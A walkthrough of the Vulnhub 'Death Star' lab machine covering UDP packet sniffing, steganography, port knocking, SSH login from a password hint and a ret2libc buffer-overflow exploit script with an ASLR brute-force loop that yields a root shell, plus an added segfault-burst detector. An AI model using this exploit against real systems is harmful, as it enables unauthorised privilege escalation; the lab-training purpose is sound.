[VLN] DeathStar

Today we are going to hack the Vulnhub machine called Death Star. You can download it from the following link: https://www.vulnhub.com/entry/death-star-1,477/
  • Video
  • Enumeration
  • On this machine nmap is of little use :) The first step is to open Wireshark and filter on the victim machine's IP with the following filter:
    ip.addr == 192.168.1.95
    With a bit of patience, we see that we receive 2 UDP packets containing the following information:
    Thanks to the successful Operation Skyhook, the Rebel Alliance got some plans for the new weapon of the Galactic Empire. We know that there is a small opening that we can explore through a thermal exhaust that is directly connected to the Main Reactor of the Death Star. The superlaser takes 1440 minutes to reload. It is very important to observe 'this window' in order to recover the blueprint. This is because, it is only possible to make an attempt every 60 seconds.
    And the other packet:
    Code to access the Death Star Blueprint within the time it takes to reload is: DS-1@OBS
    Reading it, it gives us the access code (DS-1@OBS), and we also notice the number 1440... So if we try sending some data over UDP to port 1440, it replies with something like "Wrong Code". Since we have the code, we send it and save everything we receive in the file death.txt. We see that it is base64, so we decode it and save it as death2, and finally we use file to see that it is an image...
    sml@Cassandra:~$ echo -e "DS-1@OBS" | nc -u -w1 192.168.1.95 1440 > death.txt
    sml@Cassandra:~$ cat death.txt | base64 -d > death2
    sml@Cassandra:~$ file death2
    death2: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 900x688, components 3
    sml@Cassandra:~$ mv death2 death2.jpeg
    When we open the image we see that it contains an "unlock code", but we do not know what to do with it. We use steghide with the earlier code "DS-1@OBS" as the passphrase to see if we can extract any information.
    sml@Cassandra:~$ steghide extract -sf death2.jpeg
    Anotar salvoconducto:
    anot los datos extraidos e/"openTheExhaust.txt".
    We look at the file we extracted.
    sml@Cassandra:~$ cat openTheExhaust.txt
    Each segment of the "unlock code" can only contain 3 characters sent in sequence to unlock port 10110.
    We must split the unlock code into groups of 3 digits and then port-knock with them so that port 10110 opens. We download a "knocker".
    sml@Cassandra:~$ wget https://raw.githubusercontent.com/grongor/knock/master/knock -O knock.py
    --2020-05-17 00:58:07--  https://raw.githubusercontent.com/grongor/knock/master/knock
    Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
    Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
    Petición HTTP enviada, esperando respuesta... 200 OK
    Longitud: 2932 (2,9K) [text/plain]
    Grabando a: «knock.py»

    knock.py            100%[==================================>]   2,86K  --.-KB/s    en 0s

    2020-05-17 00:58:07 (28,8 MB/s) - «knock.py» guardado [2932/2932]
    We run it:
    sml@Cassandra:~$ python3 knock.py 192.168.1.95 197 719 801 983
    And we try to connect over ssh to the port it indicated.
    sml@Cassandra:~$ ssh 192.168.1.95 -p 10110
    Devoloped by Galen Walton Erso
    System's user: erso
    Pass Hint: My wife's first name plus the year (BBY) she died.
    Glory to the Empire - Project DS-1: Orbital Battle Station
    sml@192.168.1.95's password:
    In the banner we see that the system user is erso, and that the password is his wife's first name plus the year she died. If we search the Internet we find that his wife was called Lyra and that she died in 13 (BBY), so the password is: lyra13. We log in as the user erso...
  • Low Shell
  • sml@Cassandra:~$ ssh erso@192.168.1.95 -p 10110
    Devoloped by Galen Walton Erso
    System's user: erso
    Pass Hint: My wife's first name plus the year (BBY) she died.
    Glory to the Empire - Project DS-1: Orbital Battle Station
    erso@192.168.1.95's password
    erso@deathStar1:~$
    We are in :) We explore the system.
    erso@deathStar1:~$ ls
    warning.txt
    erso@deathStar1:~$ cat warning.txt
    Message from GALEN ERSO: This is your chance. Destroy the plans of the Galactic Empire. I know that Lord Vader will not like this at all. But, this will be my chance for redemption. I hope you have enough knowledge to help destroy this new weapon. Explore the system and get 'root access' to read the secret message located at '/root/message.txt'. Hack or fail!!
    We take a look at files with "special" permissions (setuid).
    erso@deathStar1:~$ find / -perm -4000 2>/dev/null
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/traceroute6.iputils
    /usr/bin/at
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/bin/mtr
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/pt_chown
    /usr/lib/openssh/ssh-keysign
    /usr/sbin/uuidd
    /usr/sbin/pppd
    /bin/su
    /bin/ping6
    /bin/fusermount
    /bin/dartVader
    /bin/umount
    /bin/mount
    /bin/ping
    We notice the file called /bin/dartVader.
    erso@deathStar1:~$ /bin/dartVader
    dartVader: Voce tem um futuro aqui. Nao seja um Lammer, busque e aprenda realmente...
    After some testing, the binary turns out to be vulnerable to ret2libc... We download it to our machine.
  • Exploit
  • sml@Cassandra:~$ scp -P 10110 erso@192.168.1.95:/bin/dartVader .
    Devoloped by Galen Walton Erso
    System's user: erso
    Pass Hint: My wife's first name plus the year (BBY) she died.
    Glory to the Empire - Project DS-1: Orbital Battle Station
    erso@192.168.1.95's password:
    dartVader                                     100% 7338     7.0MB/s   00:00
    We start GDB-PEDA to see where it crashes...
    sml@Cassandra:~$ gdb -q dartVader
    Reading symbols from dartVader...
    (No debugging symbols found in dartVader)
    gdb-peda$ pattern_create 250
    'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b'
    gdb-peda$ pset arg 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b'
    gdb-peda$ run
    Starting program: /home/sml/dartVader 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b'

    Program received signal SIGSEGV, Segmentation fault.
    [----------------------------------registers-----------------------------------]
    EAX: 0xffffd1f0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
    EBX: 0x0
    ECX: 0xffffd560 --> 0x45485300 ('')
    EDX: 0xffffd2ea --> 0xd5d2ff00
    ESI: 0xf7fb3000 --> 0x1dfd6c
    EDI: 0xf7fb3000 --> 0x1dfd6c
    EBP: 0x65414149 ('IAAe')
    ESP: 0xffffd240 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    EIP: 0x41344141 ('AA4A')
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
    Invalid $PC address: 0x41344141
    [------------------------------------stack-------------------------------------]
    0000| 0xffffd240 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0004| 0xffffd244 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0008| 0xffffd248 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0012| 0xffffd24c ("AgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0016| 0xffffd250 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0020| 0xffffd254 ("AAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0024| 0xffffd258 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    0028| 0xffffd25c ("MAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    0x41344141 in ?? ()
    gdb-peda$ pattern_offset 0x41344141
    1093943617 found at offset: 76
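As an added aside on how PEDA arrives at that number (this is my own reconstruction of PEDA's default "extended" cyclic pattern for crash triage, not PEDA's code nor anything from the original write-up): the crashed EIP is read as four little-endian bytes, "AA4A", and looked up inside the pattern.

```python
import string
import struct

# Reconstruction of GDB-PEDA's default ("extended") cyclic pattern: three
# character groups interleaved column by column, then a De Bruijn sequence
# of order 3 over that charset. Not PEDA's own code.

def peda_charset():
    # PEDA moves 's' and 'n' to the third group and prefixes "%$-;" to the second
    lower = "%$-;" + "".join(c for c in string.ascii_lowercase if c not in "sn")
    groups = [string.ascii_uppercase, lower, "sn()" + string.digits]
    mixed, k = "", 0
    while True:
        column = "".join(g[k:k + 1] for g in groups)  # k-th char of each group
        if not column:
            return mixed
        mixed += column
        k += 1

def de_bruijn(charset, n, maxlen):
    """Order-n De Bruijn sequence over charset, cut at maxlen characters."""
    k = len(charset)
    a = [0] * k * n
    seq = []
    def db(t, p):
        if len(seq) >= maxlen:
            return
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    seq.append(charset[a[j]])
                    if len(seq) >= maxlen:
                        return
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(seq)

def pattern_create(size):
    return de_bruijn(peda_charset(), 3, size)

def pattern_offset(value, size=250):
    """Offset of a crashed 32-bit register value inside the pattern, or -1."""
    needle = struct.pack("<I", value).decode("latin-1")  # bytes as they sat in memory
    return pattern_create(size).find(needle)
```

pattern_offset(0x41344141) returns 76, and the EBP value 0x65414149 ('IAAe') sits at offset 72, exactly one saved register before the return address.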
    Good, we see that the offset is 76. Now, on the deathStar machine, we look at the libc address.
    erso@deathStar1:~$ ldd /bin/dartVader
    	linux-gate.so.1 =>  (0xb7776000)
    	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ba000)
    	/lib/ld-linux.so.2 (0xb7778000)
    The address of system...
    erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
       243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
       620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
      1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
    The address of exit...
    erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
       111: 00033690    58 FUNC    GLOBAL DEFAULT   12 __cxa_at_quick_exit@@GLIBC_2.10
       139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
       446: 000336d0   268 FUNC    GLOBAL DEFAULT   12 __cxa_thread_atexit_impl@@GLIBC_2.18
       554: 000b8634    24 FUNC    GLOBAL DEFAULT   12 _exit@@GLIBC_2.0
       609: 0011e780    56 FUNC    GLOBAL DEFAULT   12 svc_exit@@GLIBC_2.0
       645: 00033660    45 FUNC    GLOBAL DEFAULT   12 quick_exit@@GLIBC_2.10
       868: 00033490    84 FUNC    GLOBAL DEFAULT   12 __cxa_atexit@@GLIBC_2.1.3
      1037: 00128ce0    60 FUNC    GLOBAL DEFAULT   12 atexit@GLIBC_2.0
      1380: 001ad204     4 OBJECT  GLOBAL DEFAULT   31 argp_err_exit_status@@GLIBC_2.1
      1492: 000fb610    62 FUNC    GLOBAL DEFAULT   12 pthread_exit@@GLIBC_2.0
      2090: 001ad154     4 OBJECT  GLOBAL DEFAULT   31 obstack_exit_failure@@GLIBC_2.0
      2243: 00033290    77 FUNC    WEAK   DEFAULT   12 on_exit@@GLIBC_2.0
      2386: 000fc180     2 FUNC    GLOBAL DEFAULT   12 __cyg_profile_func_exit@@GLIBC_2.2
    And finally, the address of the "/bin/sh" string...
    erso@deathStar1:~$ strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
     162d4c /bin/sh
    With these values we put together our exploit, which ends up like this:
    erso@deathStar1:~$ cat ret.py
    import struct

    # Python 2 script: str concatenation of the padding and the packed
    # addresses gives raw bytes, which print writes to stdout as-is.

    def le(addr):
        # pack a 32-bit address as little-endian bytes
        return struct.pack("<I", addr)

    junk = "A" * 76                           # padding up to the saved return address (offset from pattern_offset)
    libcbase = 0xb75a5000                     # one observed libc base; with ASLR it changes on every run
    libcsystem = le(libcbase + 0x00040310)    # system()
    libcexit = le(libcbase + 0x00033260)      # exit(): becomes the return address of system()
    libcsh = le(libcbase + 0x00162d4c)        # "/bin/sh": first argument of system()

    # stack layout after the overflow: [junk][system][exit][&"/bin/sh"]
    print junk + libcsystem + libcexit + libcsh
    Since ASLR is enabled, running the exploit a single time will probably not work (the libc base is different on each run), so we wrap it in a "while" loop that keeps running it until the guessed base matches.
  • Privilege Escalation
  • erso@deathStar1:~$ while true; do /bin/dartVader $(python ret.py); done
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Illegal instruction (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    Segmentation fault (core dumped)
    # id
    uid=1000(erso) gid=1000(erso) euid=0(root) groups=0(root),1000(erso)
    And now we are root!
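From the defender's side, that loop is noisy: every wrong base guess is a crash of a setuid binary, and the kernel logs each one. The following is an added example (not part of the write-up) that flags such crash bursts in dmesg-style output; the log lines are constructed to follow the kernel's 32-bit "segfault at" message format, with invented PIDs and addresses.

```python
import re
from collections import defaultdict

# Constructed sample in the kernel's 32-bit segfault message format
# ("comm[pid]: segfault at X ip X sp Y error N"); PIDs/addresses are invented.
SAMPLE_DMESG = """\
[ 9031.118204] dartVader[2231]: segfault at b7593310 ip b7593310 sp bffff5d0 error 14
[ 9031.122870] dartVader[2232]: segfault at b75ce310 ip b75ce310 sp bffff600 error 14
[ 9031.127303] firefox[1802]: segfault at 0 ip 08c4a2f0 sp bfa0c1e0 error 4 in firefox[8048000+12000]
[ 9031.131967] dartVader[2233]: segfault at b7611310 ip b7611310 sp bffff5a0 error 14
[ 9031.136520] dartVader[2234]: segfault at b7548310 ip b7548310 sp bffff5c0 error 14
[ 9031.141088] dartVader[2235]: segfault at b75f2310 ip b75f2310 sp bffff5f0 error 14
[ 9031.145632] dartVader[2236]: segfault at b7507310 ip b7507310 sp bffff5b0 error 14
"""

SEGFAULT_RE = re.compile(
    r"^\[\s*(?P<ts>\d+\.\d+)\]\s+(?P<comm>[^\[\s]+)\[(?P<pid>\d+)\]: segfault at "
)

def parse_crashes(text):
    """Return (timestamp, process name) for every segfault line."""
    crashes = []
    for line in text.splitlines():
        m = SEGFAULT_RE.match(line)
        if m:
            crashes.append((float(m.group("ts")), m.group("comm")))
    return crashes

def crash_bursts(text, window=10.0, threshold=5):
    """Map process name -> total crashes for every process that crashed at
    least `threshold` times within any `window` seconds (sliding window)."""
    stamps = defaultdict(list)
    for ts, comm in parse_crashes(text):
        stamps[comm].append(ts)
    flagged = {}
    for comm, times in stamps.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop timestamps older than the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[comm] = len(times)
                break
    return flagged

if __name__ == "__main__":
    for comm, n in crash_bursts(SAMPLE_DMESG).items():
        print("possible brute force: %s crashed %d times" % (comm, n))
```

On the sample it reports dartVader (6 crashes in under a second) and ignores the single firefox crash; cross-checking the flagged binary against the setuid list from find makes the alert far more specific.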
  • root.txt
  • # cd /root
    # ls
    message.txt
    # cat mess
    cat: mess: No such file or directory
    # cat message.txt
    Art by Shanaka Dias
    [ASCII art of the Death Star, signed "snd"]
    -------------------------------------
    Congratulations!! You helped me destroy the empire's weapon.
    -------------------------------------
    If you had fun, love to get your feedback. Send me a tweet @mrhenrike ;)
    Until the next VM and "May the force be with you".
  • End
  • And with that we are root on the machine :)